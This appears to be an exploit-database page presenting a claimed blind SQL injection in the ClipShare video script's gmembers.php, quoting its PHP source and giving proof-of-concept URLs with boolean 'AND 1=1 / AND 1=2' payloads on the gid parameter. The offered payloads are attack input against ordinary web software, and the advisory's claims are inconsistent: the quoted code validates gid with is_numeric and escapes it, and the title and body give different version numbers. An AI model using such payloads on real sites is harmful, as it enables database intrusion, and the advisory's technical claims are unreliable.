扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 |
# Exploit Title: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability # Exploit Author: Esac # Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4 # Official site: http://www.clip-share.com # Software License: Commercial. #all versions are vulnerable: #Note : this vulnerable work just if there is a group added to the community #Last Checked: 24 March 2013 #to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini) ============================================================================================== #Vulnerable Script: PHP script : members.phpon line 23 =========================== BEGIN OF gmembers.php ============================================= <?php /************************************************************************************************ | Software Name: ClipShare - Video Sharing Community Script | Software Author: Clip-Share.Com / ScriptXperts.Com | Website: http://www.clip-share.com | E-mail : office@clip-share.com |************************************************************************************************** | This source file is subject to the ClipShare End-User License Agreement, available online at: | http://www.clip-share.com/video-sharing-script-eula.html | By using this software, you acknowledge having read this Agreement and agree to be bound thereby. |************************************************************************************************** | Copyright (c) 2006-2007 Clip-Share.com. All rights reserved. |**************************************************************************************************/ require('include/config.php'); require('include/function.php'); require('classes/pagination.class.php'); require('language/' .$_SESSION['language']. '/gmembers.lang.php'); $gname= NULL; $gurl = NULL; $oid= NULL; $gid= ( isset($_REQUEST['gid']) && is_numeric($_REQUEST['gid']) ) ? mysql_real_escape_string($_REQUEST['gid']) : NULL; $sql= "SELECT * FROM group_own WHERE GID='" .$gid. "' limit 1"; $rs = $conn->execute($sql); if ( $conn->Affected_Rows() == 1 ) { $urlkey = $rs->fields['gurl']; $gname= $rs->fields['gname']; $gupload= $rs->fields['gupload']; $oid= $rs->fields['OID']; STemplate::assign('gname', $gname); STemplate::assign('gurl', $urlkey); STemplate::assign('gupload', $gupload); } else { session_write_close(); header('Location: ' .$config['BASE_URL']. '/error.php?type=group_missing'); die(); } ...........................................; ............................................... ?> ============================================================================================================ Poc : http://server/mavideo/gmembers.php?gid=6 [Blind SQLi] Real exploitation : http://server/mavideo/gmembers.php?gid=6 AND 1=1 ==> return normal page http://server/mavideo/gmembers.php?gid=6 AND 1=2 ==> return page with some errors ( or with nothing - white page ) -------------------------------------------------------------------------------------- PwnEd. Tested version: Sunday , March 24, 2013 | Version: 4.1.4 | Username: admin | Logout Copyright © 2006-2008 ClipShare. All rights reserved. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Greetz : White Tarbouch Team ./Esac |
体验盒子
